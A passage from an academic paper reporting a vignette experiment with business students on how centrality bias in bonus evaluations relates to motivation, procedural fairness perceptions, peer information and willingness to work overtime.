With regard to autonomy, we argue that the clouding of the link between an individual’s effort and the resulting reward may be perceived as a restriction of autonomy. If individuals strive for a particular outcome, they can be less sure on whether their choices of action yield the intended outcome, given that the performance evaluation is less sensitive to their actual work. The mitigation of the linkage between effort and reward may therefore diminish the feeling of having possibilities of choice. We predict that this adverse effect of centrality bias applies to above-average as well as below-average performers likewise.
Concerning the feeling of relatedness, the literature suggests that it is satisfied, for instance, when superiors appear caring (Deci and Ryan 2000).6 Against this background, below-average performers may interpret their disproportionally high reward as “distal support” (Deci and Ryan 2000, p. 235) for their efforts that may contribute to the feeling of a close connection with the superior. In contrast, above-average performers may perceive the disproportionally low reward as a signal of personal distance and lack of sufficient acknowledgement. Therefore, centrality bias may mitigate the feeling of relatedness on part of above-average performers. Taken together, we expect that centrality bias decreases the satisfaction of all three psychological needs for above-average performers, leading to the following hypothesis:
H2: Centrality bias is negatively related to autonomous motivation of above-average performers.
For below-average performers, we argue that the feeling of autonomy is likely to decrease, whereas the feelings of competence and relatedness may increase. Depending on how these effects outweigh, there might be a positive or negative relationship or no association at all. Given that the presence and the sign of the relationship are unclear ex ante, we pose the following research question (RQ):
RQ1: How is centrality bias related to autonomous motivation of below-average performers?
2.4 The mediating role of procedural fairness perceptions
Previous research suggests that the perceived fairness of performance evaluation is another psychological mechanism that influences individual behaviour as it affects work-related attitudes and outcomes (Burney et al. 2009; Lau and Tan 2006). Empirical evidence indicates that employees are more committed to work and perform better in their tasks if they perceive performance evaluations as fair (Colquitt et al. 2001). Correspondingly, we predict a positive relationship between the perceived fairness of performance evaluation and the willingness to exert work effort. With regard to fairness perceptions, the management accounting literature distinguishes two dimensions of fairness: distributive fairness—which refers to the perception of the distribution of outcomes among employees (Burney et al. 2009)—and procedural fairness—which reflects the perceived fairness of procedures that are used in the context of performance evaluation (Burney et al. 2009; Voußem et al. 2016). Given that our paper refers to bias as part of the performance evaluation process, we focus on the procedural fairness of the performance evaluations (Hartmann and Slapničar 2012b).
In a recent paper, Voußem et al. (2016) analyse the relationship between subjective performance measures and fairness perceptions. They detect an inverted U-shaped relationship implying that subjectivity in performance evaluations increases the perceived fairness if the weight placed on the subjective measures is low. If a higher weight is placed on subjective performance measures, however, subjectivity decreases fairness perceptions. These findings support their line of reasoning that subjective performance measurement implies costs and benefits. They argue that, as the emphasis on subjectivity increases, the marginal benefits are likely to decrease, whereas the marginal costs increase. Voußem et al. (2016) consider biased evaluations as part of the costs of subjective performance evaluations. However, the relationship between centrality bias and procedural fairness perceptions has not yet been investigated explicitly.
Our prediction for the relationship between centrality bias and procedural fairness perceptions draws on referent cognitions theory which argues that individuals rely on reference comparisons in assessing fairness (Cropanzano and Folger 1989; Goldman 2003). More precisely, this theory suggests that individuals reflect on performance evaluation outcomes by generating mental simulations and comparing the actual outcome with a potential outcome that relies on a procedure, which is considered to be valid (McFarlin and Sweeney 1992; van den Bos and van Prooijen 2001). If the potential outcome is more favourable and the procedure used to determine the actual outcome appears less valid, individuals are expected to feel treated unfairly. We suggest that such comparisons appear particularly likely in situations in which the superior has the discretion to adjust an objective measure. In this setting, we expect that the potential outcome based on the objective measure without adjustments is likely to serve as a reference. In presence of a centrality bias, above-average performers receive a reward that falls short of the unbiased evaluation. Therefore, we expect that above-average performers consider the process underlying the biased outcome unfair and penalize it with lower effort.
H3: Centrality bias is negatively related to procedural fairness perceptions of above-average performers.
For below-average performers, the actual outcome is more favourable than the potential one according to the objective performance measure, suggesting that the superior applies a benevolent appraisal procedure. At the same time, the procedure for determining the reward is not discernible for the subordinate and thus may be perceived as less valid. In particular, below-average performers cannot rule out that the procedure will put them at a disadvantage in the future, even though they currently benefit from it. Due to this ambiguity inherent in the relationship between centrality bias and procedural fairness perceptions for below-average performers, there might be a positive or negative relationship or no association at all. For this reason, we pose the following research question:
RQ2: How is centrality bias related to procedural fairness perceptions of below-average performers?
The aforementioned lines of reasoning suggest a direct relationship between procedural fairness perceptions and the willingness to exert work effort. However, the prior literature also provides arguments and corresponding evidence for an indirect effect: Procedural fairness perceptions may be positively related to autonomous motivation (Hartmann and Slapničar 2012a; Zapata-Phelan 2009). In particular, an evaluation process that is perceived as fair (unfair) may enhance (mitigate) the feeling of relatedness with the superior. This argument is in line with the reasoning by Cugueró-Escofet and Rosanas (2013) that procedural fairness perceptions may lead to a sense of belonging and thus may improve the feeling of relatedness with the superior. In addition, procedural fairness perceptions may be stronger when rewards reflect organizational objectives more clearly, implying lower ambiguity for an individuals’ work role (Hartmann and Slapnicar 2012a, b). Such perceptions may reinforce the feeling of competence and thus imply a positive relationship between procedural fairness perceptions and autonomous motivation. Taken together, we suggest that fairness perceptions may affect the willingness to exert work effort directly as well as indirectly via autonomous motivation. In the findings section, our data analysis will consider both options.
2.5 The moderating role of peer information
Prior research does not take into consideration whether the individuals who are subject to a centrality bias are aware of the degree to which their peers are affected (Bol 2011; Engellandt and Riphahn 2011; Kampkötter and Sliwka 2017). However, theoretical insights suggest that peer information may have an impact on the association of centrality bias with autonomous motivation as well as with procedural fairness perceptions. For this reason, we discuss the moderating role of peer information in the following.
Social comparison theory suggests that individuals compare themselves with peers when the outcome of performance evaluations is available—even when they are not competing for a tangible outcome (Luft 2016; Tafkov 2013). Empirical evidence suggests that the disclosure of rankings motivates individuals to exert more work effort and to improve their performance relative to others (Hannan et al. 2013; Newman and Tafkov 2014). However, in the case of centrality bias, we argue that the disclosure of peer information is likely to decrease the impact of an employee’s autonomous motivation to exert work effort. In presence of centrality bias, the provision of peer information reveals a systematic measurement error if information on actual work effort is available. Correspondingly, below-average performers are likely to recognize that their inflated reward is not driven by a specific acknowledgement or a close relationship with their superior.7 Moreover, the overvaluation of their performance as well as the undervaluation of above-average performers may imply that the relatedness among subordinates decreases. For this reason, we expect that the enhancement of the feelings of competence and relatedness due to inflated ratings—as suggested in Sect. 2.3—is mitigated.
Similarly, above-average performers get to know that their peers with a below-average performance have received inflated rewards, while they themselves were subject to a deflated evaluation (Hartmann and Slapničar 2012b). This awareness is likely to decrease the feeling of relatedness among the subordinates. Moreover, the feeling of autonomy might suffer further if above-average performers find that an increase in effort is even likely to increase the discrepancy between the actual effort and their evaluation. Against this background, we state the following hypothesis:
H4: Peer information reinforces the effect of centrality bias on autonomous motivation.
The provision of peer information may also impact the relationship between centrality bias and procedural fairness perceptions. While the referent cognitions theory introduced in Sect. 2.4 predicts that fairness perceptions are based on a comparison of the actual performance evaluation outcome and a potential one, equity theory assumes that fairness perceptions are contingent on a comparison of an individual’s own “return on effort” and the returns received by his peers (Adams 1965). According to equity theory, individuals expect to receive an “appropriate rate of return”, which is the ratio of the benefits an individual receives (i.e., outcomes) and the contributions an individual makes (i.e., input) (Greenberg et al. 2007). Equity theory further assumes that an individual compares his own rate of return with those of his peers. In this context, equity is obtained if the rates of return (i.e., the output-input ratios) are equal among the focal individual and his peers (Adams 1965). This equity considerably shapes the fairness perception of an evaluation process.
Centrality bias leads to inequity, given that the undervaluation of above-average performers and the overvaluation of below-average performers imply different rates of returns. Therefore, we assume that above-average performers who have access to peer information will consider their reward unfair. Due to the perceived unfairness, an undervalued individual is expected to restore equity by decreasing his input (Carrell and Dittrich 1978; Franco-Santos et al. 2012). Thus, we expect that the negative relationship between centrality bias and procedural fairness perceptions becomes stronger. In a similar vein, we expect that below-average performers consider the inequity resulting from centrality bias unfair as well if they are inequity averse, even though they are currently beneficiaries of this bias. Formally stated, these expectations lead to the following hypothesis:
H5: Peer information reinforces the effect of centrality bias on procedural fairness perceptions.
2.6 Summary
Summary of conceptual model
3 Method
3.1 Experimental design
We investigated our hypotheses and research questions by using a vignette experiment with a 2 × 2 × 2 × 2 between-subjects design. Thus, the experiment relies on 16 different vignettes. A vignette is “a short, carefully constructed description of a person, object, or situation, representing a systematic combination of characteristics” (Atzmüller and Steiner 2010, p. 128). It consists of a series of text modules, for which the experimenters construct different attributes. In line with Kunz (2015), the vignettes used in our study rely on a binary set of attributes for each of the four varying text modules. As other types of experiments, vignette experiments reveal a high degree of internal validity, as the experimenters have control over the variables (Birnberg et al. 1990). However, vignette experiments do not capture the participants’ actual behaviour, but their behavioural intentions (Kunz and Linder 2012). Therefore, vignette experiments appear particularly applicable to studies that intend to assess unobservable measures such as intentions and attitudes (Aguinis and Bradley 2014; Kunz and Linder 2012). Hence, the vignettes are complemented by a questionnaire that captures these intentions and attitudes. In our case, the questionnaire primarily refers to the participants’ motivation and fairness perception as well as their willingness to exert additional work effort against the background of the described situation.
Similarly as in Kunz (2015) and Kunz and Linder (2012), the participants read the description of a hypothetical work situation and were asked to decide about the degree of additional work effort she or he is willing to exert. The work situation stated that the participant worked as a consultant who was engaged in a management accounting project along with the project manager and four further consultants with a similar working experience as the participant was assumed to have (see the Appendix for the full text). The vignette contained some information about the work climate to help participants to relate to the situation. The participants were told that they receive a bonus payment to compensate them for their prior work effort, given that the first of four project milestones was just completed. The text declared the bonus determination a responsibility of the project manager. It went on by stating that the executive board of the consulting firm recommended to the project manager to refer to the individual overtimes for the bonus assessment; however, eventually the project manager was authorized to decide freely and entirely on his own on the rewards. For this reason, our setting reflects a situation, in which the superior has the discretion to adjust an objective measure (i.e., overtimes) based on his subjective assessment. Given that the experimental variables rely on newly developed specifications, we pre-tested and discussed the vignettes with several management accounting researchers as well as 24 graduate students who were not part of the final sample. Based on their feedback, we slightly adjusted the wording of individual text modules.
3.2 Measures
3.2.1 Experimental variables
Graphic representation of bonus payments and overtime hours included in the vignettes
The third variable captures the provision of peer performance and compensation information. If peer information was provided, a figure showed the proportion of the bonus received by the participant and the rewards which were received by his or her colleagues (Panels B and C in Fig. 2). For simplicity, we indicated a linear relationship between the overtime provided and the bonuses received. The provision of peer information (PEER) was coded 1 for the regression analyses and 0 otherwise. Eventually, we manipulated the overall work situation by describing either a relatively positive or a relatively negative work environment. For this reason, we drew on the text modules from Kunz (2015). The positive work situation (SITUATION) was coded 1, the negative one 0.8 In contrast to the aforementioned explanatory variables, the work situation is a control variable to make the scenario more realistic and to avoid that the participants relate the scenario with a specific situation from their experience, which is outside of the experimenters’ control (Kunz 2015).
3.2.2 Dependent variable
Statistics regarding work effort scale
3.2.3 Motivation types
Statistics regarding motivation scales
3.2.4 Procedural fairness perceptions
Statistics regarding procedural fairness scale
3.2.5 Control variables
To test the ecological validity of the vignettes, we included three questions on their comprehensibility, traceability and closeness to reality from Kunz (2015). The participants were asked to state their degree of agreement based on a 7-point Likert scale. Comprehensibility was measured based on the item “How well did you understand the presented work situation?” (COMPREHEN; 1 = very poorly; 7 = very well), while the item “How easily could you put yourself into the presented work situation?” measured the traceability of the vignettes (TRACE; 1 = very difficult; 7 = very easy). Eventually, the item “How would you rate the closeness of the work situation described above to real-life situations?” measured the perceived closeness to reality (REALITY; 1 = very unrealistic; 7 = very realistic). Furthermore, we controlled for the participants’ age (AGE; in years) and gender. For the latter, we introduced the variable FEMALE which equals 1 in the case of female participants and 0 otherwise. We also considered that the attractiveness of consultancy work may have an impact on the willingness to exert work effort in the given situation. For this reason, we added an item asking “How attractive is a career as a consultant for you (irrespective of the described situation)?” (ATTRACTIVE; 1 = very unattractive; 7 = very attractive). Eventually, we relied on the dummy variable EXPOSURE to distinguish between graduate and undergraduate students used because of the rationale outlined in Sect. 3.3. All these items entered our analyses as control variables.
3.3 Data collection
The participants in our experiment were 325 undergraduate students and 126 graduate students in business administration enrolled at a German university.10 We excluded the questionnaires from 21 undergraduate students and 5 graduate students as they failed the manipulation check. Therefore, we used 425 responses in total for our analyses. t-tests on all variables (except for AGE) did not reveal any significant differences.11 Therefore, we considered both samples simultaneously in our analyses. In line with our between-subject design, each participant received one randomly assigned vignette with the questionnaire. We abstained from the provision of detailed information on the study’s objectives to ensure that the participants replied to the questionnaire unbiased. Therefore, the students were only told that the study contributes to a deeper understanding of the effects of performance measurement systems. For minimising the threat of social desirable responses, full anonymity and confidentiality were guaranteed (Kunz 2015).
Due to the reliance on students, our participants have restricted working experience and thus may confine the external validity of our findings. However, in line with Kunz (2015) we argue that the involvement of students has at least two major advantages. On the one hand, students are used to getting evaluated during their university and school education. In many cases, such evaluation relies on subjective assessments. For this reason, they have developed some understanding for the situation described in the vignettes. On the other hand, they are unlikely to have yet a notion of a generally accepted design of a performance measurement system or of a socially desired reaction to it. Therefore, past experiences with performance measurement systems are unlikely to confound our findings. Nevertheless, the graduate students participating in our study may have attended lectures on subjective performance measurement. If they are familiar with performance evaluation biases, issues regarding socially desirable answers might occur. This concern is put into perspective as the curriculum of the master studies at the university at which the experiment took place does not cover issues related to subjective performance evaluation. However, as we cannot rule out entirely that the graduate students have higher exposure to performance measurement topics, we added the control variable EXPOSURE as outlined above.
Despite these limitations, we argue that the students’ familiarity with evaluations in general is likely to increase the understandability and traceability of the presented situation. At the same time, we argue that their limited experience with performance measurement systems contributes to the internal validity of our study as it appears less of a concern that past experiences interact with the participants’ attitude revealed in the experiment.
4 Findings
4.1 Manipulation checks and descriptive statistics
We included several items in the questionnaire to check the effectiveness of our manipulations. For all manipulation check items, we asked the participants to state their level of agreement on a 7-point Likert scale (1 = I do not agree at all; 7 = I fully agree). For the examination of the performance manipulation, we used the item “My overtime hours are above the project team average.”. The mean score on this item is significantly (t = 28.68, p < 0.001) higher in the above-average performance condition (mean = 5.85, SD = 1.62) than in the below-average performance condition (mean = 1.85, SD = 1.24). To test the manipulation of centrality bias, we relied on the item “The bonus that I have received corresponds with the bonus to which I am eligible based on my overtime hours.”. The mean score on this item is 2.21 (SD = 1.45) in the bias condition and 5.32 (SD = 1.59) in the non-bias condition. We find that the difference between the scores is highly significant (t = 21.04, p < 0.001). For the test on the disclosure of peer information, we included the item “I know the ratio of my bonus to those of my colleagues.”. The mean score on this item is higher for the condition, in which peer information is disclosed (mean = 5.88, SD = 1.34), as compared to the situation in which such information is not available (mean = 2.20, SD = 1.81). This difference is significant (t = 23.57, p < 0.001). As our manipulation of work climate refers to the participant’s self-determination in the work process as well as to the cooperation behaviour in the team, we included two items to test the effectiveness of our work climate manipulation. The item reflecting the first dimension states “The project work enables me to perform tasks self-determinately.”. The mean score for the condition with a good work climate is 5.80 (SD = 0.92) as compared to a mean of 2.58 (SD = 1.59) for the condition with poor work climate. The difference is significant (t = 25.52, p < 0.001). The item on cooperation states “The project work is characterized by a cooperative mode of operation.”. We find that the mean score is significantly (t = 22.96, p < 0.001) higher for the condition of good work climate (mean = 5.91, SD = 0.95) as compared to the condition of poor work climate (mean = 2.97, SD = 1.61). In light of these findings, we conclude that all of our manipulations were effective.
Descriptive statistics on the willingness to exert work effort (OVERTIME)
Further insights are provided when we separate the participants in the above-average performance condition (Panel B) from those of the below-average performance condition (Panel C). We find the highest mean score for above-average performers in the cell without centrality bias but with disclosure of peer information (mean = 16.04, SD = 4.38). The mean score is the lowest for above-average performers that are subject to bias and do not have peer information (mean = 12.46, SD = 4.50). For above-average performers, t-tests indicate that the mean differences between the conditions with and without centrality bias are significant at the 0.01 level. For the below-average performers, the difference between the mean scores in the conditions with and without centrality bias is considerably lower. Correspondingly, the t-tests find that the difference in means is not significant. Nevertheless, we observe the tendency that participants in the below-average condition are on average willing to exert slightly more effort in presence of centrality bias as compared to the non-bias condition, when peer information is disclosed. The same holds true reciprocally for the conditions, in which no peer information is given.
4.2 The overall effect of centrality bias on the willingness to exert work effort
OLS regression results on the direct effect of centrality bias on the willingness to exert work effort
4.3 The mediating effects of motivation and fairness perceptions
Our theoretical considerations suggest that controlled motivation, autonomous motivation and procedural fairness perceptions may mediate the relationship between centrality bias and the willingness to exert work effort. For this reason, they may explain the reported overall effects. Mediation models include two causal paths: the direct relationship between the independent variable (BIAS) and the dependent variable (OVERTIME) as well as an indirect relationship including one path from BIAS to the mediator (AUT_COT, CON_MOT and FAIRNESS, respectively) and one from the mediator to OVERTIME. Correspondingly, Baron and Kenny (1986) suggest to estimate a series of regression models to test for mediation. In line with the aforementioned causal paths, OVERTIME is first regressed on BIAS. In a second step, the mediator is regressed on BIAS. Eventually, OVERTIME is regressed on BIAS and the mediator. To establish mediation, BIAS must be significantly related to OVERTIME in the first equation and to the mediator in the second equation. Eventually, the mediator must be significantly related to OVERTIME in the third equation. A partial mediation requires that the relationship between BIAS and OVERTIME is weaker in the third equation than in the first one. In other words, if there is a mediation, the direct relationship between BIAS and OVERTIME is weaker when we control for the indirect effect of BIAS on OVERTIME through the mediator. In case of a full mediation, there is no significant relationship between BIAS and OVERTIME in the third equation (Baron and Kenny 1986).
Mediation analysis on the indirect effect of centrality bias on the willingness to exert work effort
As shown in Panel A, we find that BIAS is negatively and significantly associated with AUT_MOT and CON_MOT respectively (Rows 1 and 2). These findings suggest that both types of motivation decrease in presence of BIAS. Row 4 reports positive and significant coefficients for both types of motivation on the willingness to exert work effort. Moreover, we find that the coefficient for BIAS is considerably smaller when we control for the indirect effect through the mediators as compared to the regression that estimates the direct effect of BIAS only (see Table 5). These findings suggest that the relationship between BIAS and OVERTIME is partially mediated by autonomous as well as controlled motivation. In contrast, we do not find that BIAS is significantly associated with FAIRNESS (Row 3), suggesting that FAIRNESS does not mediate the relationship between BIAS and OVERTIME.
However, these findings are put into perspective when we illuminate above-average and below-average performers separately. According to Panel B of Table 6, BIAS is significantly and negatively related to AUT_MOT and CON_MOT for above-average performers (Rows 1 and 2). We also detect positive and significant coefficients for AUT_MOT and CON_MOT on OVERTIME. These findings are in line with H1, which refers to the mediating role of CON_MOT. Moreover, we find support for H2, which predicts that AUT_MOT negatively mediates the relationship between BIAS and OVERTIME for above-average performers. In contrast, there is no significant relationship between BIAS and AUT_MOT as well as between BIAS and CON_MOT for below-average performers (Panel C, Rows 1 and 2). BIAS is negatively associated with the two types of motivation for below-average performers. However, this relation is weaker than for above-average performers and not significant. Therefore, H1 is only partially, i.e. for above-average performers, supported. However, the non-significant relationship between BIAS and AUT_MOT is in line with our reasoning related to RQ1 suggesting that the opposing effects of centrality bias on the psychological needs which determine autonomous motivation may result in a non-significant relationship between BIAS and AUT_MOT.
Row 3 of Panels B and C reveals some noteworthy findings regarding the mediating role of FAIRNESS. Whereas we do not find a significant relationship between BIAS and FAIRNESS for the full sample, we find that BIAS is negatively and significantly associated with FAIRNESS for above-average performers. This finding supports H3. Row 3 of Panel C implies a response to RQ2 as we find that for below-average performers, BIAS is highly significantly and positively related to FAIRNESS. Interestingly, we find that FAIRNESS is in turn positively and significantly associated with OVERTIME for above-average performers (Row 4 of Panel B). For below-average performers, however, this relationship is not significant (Row 4 of Panel C). These findings indicate that FAIRNESS is a partial mediator for above-average performers only. For below-average performers, our findings suggest that they perceive their inflated reward as fair. Yet, this fairness perception does not seem to “translate” into a higher willingness to exert work effort.
Mediation analysis on the indirect effect of procedural fairness perceptions on autonomous motivation
4.4 The moderating effects of peer information
H4 and H5 predict that the associations of bias with autonomous motivation and with procedural fairness perceptions are moderated by the disclosure of peer information. These hypotheses thus suggest a two-way interaction between BIAS and PEER. To test these interactions, we constructed two models that were subject to an OLS regression. The first one includes AUT_MOT as the dependent variable, whereas FAIRNESS is the dependent variable of the second model. In both cases, BIAS, PEER and the interaction term BIASxPEER are the primary variables of interests.
Moderation analysis on peer information
The regression results with regard to FAIRNESS are reported in Row 2 of Table 8. The two-way interaction of BIAS and PEER is not significantly related to FAIRNESS for the full sample (Panel A). The same conclusion holds for the separate analysis of above-average (Panel B) and below-average performers (Panel C). The coefficient for the interaction term of BIAS and PEER is positive for above-average performers. This finding suggests that the negative relationship between BIAS and FAIRNESS tends to be weaker when peer information is available. However, this finding is not significant. With regard to below-average performers, we find that the coefficient of BIASxPEER is negative. It indicates that the positive relationship between BIAS and FAIRNESS is weaker when peer information is disclosed, yet this effect is not significant. Taken together, we find no support for H5.
This analysis treats AUT_MOT and FAIRNESS as separate dependent variables. Since we found that the relationship between BIAS and AUT_MOT is fully mediated by FAIRNESS for above-average performers (see Table 7), we complement this analysis by a moderated mediation analysis including BIAS as the independent variable, FAIRNESS as the mediator, AUT_MOT as the dependent variable and PEER as the moderator. These untabulated findings do not change qualitatively with the exception that the direct relationship between BIAS and AUT_MOT is for the above-average performers no longer significant since it is mediated by FAIRNESS. Therefore, the previously outlined conclusions remain unaffected.
5 Discussion
Given that firms frequently rely on performance measurement systems which incorporate subjectivity, a thorough understanding of the emergence and effects of bias arising out of subjective performance evaluations appears important. Our study contributes to corresponding research endeavours by focusing on the psychological mechanisms activated by centrality bias. Our main argument is that bias is likely to trigger several psychological mechanisms, comprising controlled and autonomous motivation as well as procedural fairness perceptions. The distinction of controlled and autonomous motivation as well as the consideration of fairness perceptions enable us to develop a more sophisticated understanding of the effects of centrality bias on the willingness to exert work effort. A closer examination of these psychological mechanisms appears particularly interesting for below-average performers who benefit from centrality bias as they are overvalued. Based on insights from the social psychology literature, we discussed potentially opposing effects of centrality bias for this group, resulting in an ambiguous net effect. For above-average performers, we expected that controlled and autonomous motivation as well as procedural fairness perceptions negatively mediate the relationship between centrality bias and the willingness to exert work effort. We tested our hypotheses and answered our research questions based on data collected during a vignette experiment.
Summary of findings for above-average performers
Our interpretation of this finding relies on the referent cognitions theory and suggests that this negative relationship results from a comparison of the potential reward, which relies on an objective measure, with the subjectively adjusted reward. We argue that above-average performers are likely to consider the procedure for the determination of the potential reward based on the objective measure more valid, suggesting that the adjustment is considered unfair. From the perspectives of social comparison theory and equity theory, it appears surprising that the disclosure of peer information does not significantly moderate the associations of centrality bias with autonomous motivation and with procedural fairness perceptions. These findings suggest that the awareness of the “source” of the bias does not impact the psychological mechanisms triggered. With regard to autonomous motivation, a potential explanation is that the marginal effects of disclosing peer information on the feelings of relatedness and autonomy are negligible. Concerning procedural fairness, we suggest that fairness perceptions obviously depend more strongly on comparisons with the unadjusted objective measure than on comparisons with peers.
Summary of findings for below-average performers
Eventually, we find that centrality bias is positively and significantly associated with procedural fairness perceptions. We argue that this relationship may be the outcome of a comparison between the reference and the actual evaluation. Interestingly, procedural fairness perceptions are not significantly associated with autonomous motivation for below-average performers. With regard to the moderating effect of peer information, we neither detect a significant moderating effect for the relationship between centrality bias and autonomous motivation nor for the relationship between centrality bias and procedural fairness perceptions. A potential explanation is that individuals do not pay considerable attention to comparisons with their peers when their own evaluation does not appear trustworthy anyway due to the deviation from the objective measure. This finding reinforces the previously outlined conclusion that the psychological mechanisms do not change if the subordinates are aware of the “source” of the bias.
Taken together, our paper advances our understanding of the psychological mechanisms activated by centrality bias by adopting a broader view that goes beyond an economic perspective. A number of implications arise out of these findings. First, we conclude that transparency due to the provision of peer information does not enhance negative or mitigate positive effects of centrality bias. This finding appears particularly noteworthy in light of a recent study by Bol et al. (2016). They find that the simultaneous increase of information accuracy and outcome transparency may incentivize managers to provide less compressed ratings. In our setting, we regard the provision of peer information as an increase in outcome transparency. Taking the findings by Bol et al. (2016) and ours together, increasing outcome transparency may be an effective design feature of performance measurement systems which include subjectivity, as it may prevent the emergence of centrality bias, but does not aggravate adverse effects if centrality bias occurs after all. Second, these findings complement previous research on relative performance evaluation and tournaments, which indicates that the disclosure of rankings increases the motivational effects on work effort (Luft 2016). Our findings suggest that this effect is not observable when outcome transparency unveils a centrality bias. This conclusion underlines that sensitivity (i.e., sufficient differentiation) in performance evaluation constitutes an important requisite for the motivational effects of peer information detected by prior research. Third, we find that fairness is the only psychological mechanism that is positively affected by centrality bias for below-average performers. Yet, we do not find that fairness is positively associated with the willingness to exert work effort in this context. In summary, we thus conclude that the adoption of a broader perspective going beyond predictions by economic theory explores several simultaneously occurring psychological mechanisms, which in sum, however, do not necessarily result in an increasing willingness to exert work effort. Thus, we detect some asymmetry in the psychological mechanisms as those that lead to adverse effects for above-average performers, do not imply favourable effects on parts of the below-average performers.
Our study is subject to a number of limitations. As outlined in the introduction, vignette experiments rely on constructed descriptions of hypothetical situations and capture intentions and attitudes of the participants with regard to these situations. Therefore, vignette experiments appear particularly applicable when researchers are interested in fairness perceptions or motivational processes (Liebe 2017). Nevertheless, we acknowledge that the responses by the participants might be different if they had performed a real-effort task and thus would be more strongly “affected” by an overvaluation or undervaluation. While we cannot rule out this concern entirely, we argue that the high scores on traceability (mean = 5.22) suggest that the participants on average put themselves well into the work situation. Moreover, we expect that a stronger involvement and identification with the situation might have stronger psychological implications. Therefore, we expect that our analysis rather tends to underestimate the psychological mechanisms than to overestimate them. Moreover, we acknowledge that we potentially underestimate the influence of peer information as it may play a more pivotal role in real settings, in which employees have personal relationships with their peers.
In addition, the setting of the case and our manipulation of the variables imply a number of limitations. First, the context of the case is a consulting firm. We chose this context to provide a setting, which the participants can easily understand. In those firms, however, interdependencies between subordinates tend to be stronger because the members of a project team collaborate closely together. At the same time, the working environment tends to be highly competitive. It is possible that corresponding associations have affected the participants’ responses. Second, we manipulated performance at two extremes: Participants were either the team member with the lowest or highest overtime hours. However, our findings might differ at intermediate levels of performance. More precisely, it is possible that the associations investigated would be less pronounced for individuals who provide non-extreme levels of performance. Third, we disclosed the ratio of bonus payments, but did not specify the individual amounts. A more differentiated manipulation could carry the risk that varying monetary preferences might confound the findings. Eventually, we acknowledge that the manipulation of the independent variables strengthens causal claims. Nevertheless, we rely on cross-sectional data only, whereas longitudinal data may provide further insights. Against this background, we hope that our study will encourage further research into the psychological mechanisms triggered by centrality bias and their implications for individual and organizational performance. Such research could also consider additional types of bias. In this regard, we put the enrichment of economic theory with insights from the social psychology literature forward to gather a deeper understanding of the behavioural implications of performance evaluation issues.
Footnotes
- 1.
In addition to subjective adjustments to objective performance measures, such as discretionary discounts or premiums by a superior (Cheng and Coyte 2014; Woods 2012), subjective performance evaluation may refer to assessments of specific performance dimensions, which cannot be measured objectively (i.e., work attitude or interpersonal skills), based on a superior’s personal impressions and opinions (Hartmann et al. 2010; Van der Stede et al. 2006). In line with prior research, this paper focuses on subjective adjustments to objectively measured performance for the determination of monetary rewards as this kind of subjectivity is frequently part of compensation contracts (Höppe and Moers 2011; Ederhof 2010).
- 2.
- 3.
- 4.
We assume that motivation as well as the fairness perceptions discussed in Sect. 2.4 are positively related to the willingness to exert work effort. Therefore, our hypotheses 1–3 imply a mediation. In other words, we predict that the relationship between centrality bias and effort is mediated by motivation and fairness perceptions, respectively. Given that prior research has accumulated a comprehensive body of literature indicating that motivation and fairness perceptions are positively related to effort and performance (Bonner and Sprinkle 2002; Colquitt et al. 2001), we focus on the psychological mechanisms activated by centrality bias and do not state the mediations explicitly.
- 5.
This assumption does not imply that performance evaluations and corresponding rewards are obsolete as individuals may not be sufficiently autonomously motivated to exert work effort. For this reason, we consider controlled and autonomous motivation as complements rather than substitutes.
- 6.
The feeling of relatedness does not only refer to the relationship between a subordinate and his superior, but may also affect the relationships among subordinates (Gagné and Deci 2005). We take the latter into consideration when we refer to the moderating role of peer information (see Sect. 2.5), which is likely to have an impact on the feeling of relatedness among subordinates.
- 7.
Note that peer information reveals the “source” of the bias to the subordinate. While the subordinate perceives “some bias” in absence of peer information, the provision of peer information enables him to perceive centrality bias as such. Therefore, the hypotheses on peer information relates to what changes a subordinates’ perception of the bias. We are grateful to an anonymous reviewer for pointing this out.
- 8.
- 9.
- 10.
While the material was provided to the participants in German, this paper relies on a self-produced translation of the material.
- 11.
We did not perform a test on EXPOSURE, given that being an undergraduate or graduate student is the separation criterion for this variable.
References
- Adams JS (1965) Inequity in social exchange. Adv Exp Soc Psychol 2:267–299CrossRefGoogle Scholar
- Aguinis H, Bradley KJ (2014) Best practice recommendations for designing and implementing experimental vignette methodology studies. Org Res Methods 17(4):351–371CrossRefGoogle Scholar
- Ahn TS, Hwang I, Kim M-I (2010) The impact of performance measure discriminability on ratee incentives. Acc Rev 85(2):389–417CrossRefGoogle Scholar
- Atzmüller C, Steiner PM (2010) Experimental vignette studies in survey research. Methodol Eur J Res Methods Behav Soc Sci 6(3):128–138Google Scholar
- Baker GP, Jensen MC, Murphy KJ (1988) Compensation and incentives: practice vs. theory. J Financ 43(3):593–616CrossRefGoogle Scholar
- Baron RM, Kenny DA (1986) The moderator-mediator variable distinction in social psychological research: conceptual, strategic, and statistical considerations. J Pers Soc Psychol 51(6):1173–1182CrossRefGoogle Scholar
- Berger J, Harbring C, Sliwka D (2013) Performance appraisals and the impact of forced distribution—an experimental investigation. Manage Sci 59(1):54–68CrossRefGoogle Scholar
- Birnberg JG, Shields MD, Young SM (1990) The case for multiple methods in empirical management accounting research (with an illustration from budget setting). J Manage Acc Res 2:33–66Google Scholar
- Bol JC (2008) Subjectivity in compensation contracting. J Acc Lit 24:1–27Google Scholar
- Bol JC (2011) The determinants and performance effects of managers’ performance evaluation biases. Acc Rev 86(5):1549–1575CrossRefGoogle Scholar
- Bol JC, Kramer S, Maas VS (2016) How control system design affects performance evaluation compression: the role of information accuracy and outcome transparency. Acc Organ Soc 51:64–73CrossRefGoogle Scholar
- Bonner SE, Sprinkle GB (2002) The effects of monetary incentives on effort and task performance: theories, evidence, and a framework for research. Acc Organ Soc 27(4–5):303–345CrossRefGoogle Scholar
- Breuer K, Nieken P, Sliwka D (2013) Social ties and subjective performance evaluations: an empirical investigation. Rev Manag Sci 7(2):141–157CrossRefGoogle Scholar
- Burney LL, Henle C, Widener SK (2009) A path model examining the relations among strategic performance measurement system characteristics, organizational justice, and extra- and in-role performance. Acc Organ Soc 34(3–4):305–321CrossRefGoogle Scholar
- Carrell MR, Dittrich JE (1978) Equity theory: the recent literature, methodological considerations, and new directions. Acad Manage Rev 3(2):202–210Google Scholar
- Chen Y-L (2014) Determinants of biased subjective performance evaluations: evidence from a Taiwanese public sector organization. Acc Bus Res 44(6):656–675CrossRefGoogle Scholar
- Cheng MM, Coyte R (2014) The effects of incentive subjectivity and strategy communication on knowledge-sharing and extra-role behaviours. Manage Acc Res 25(2):119–130CrossRefGoogle Scholar
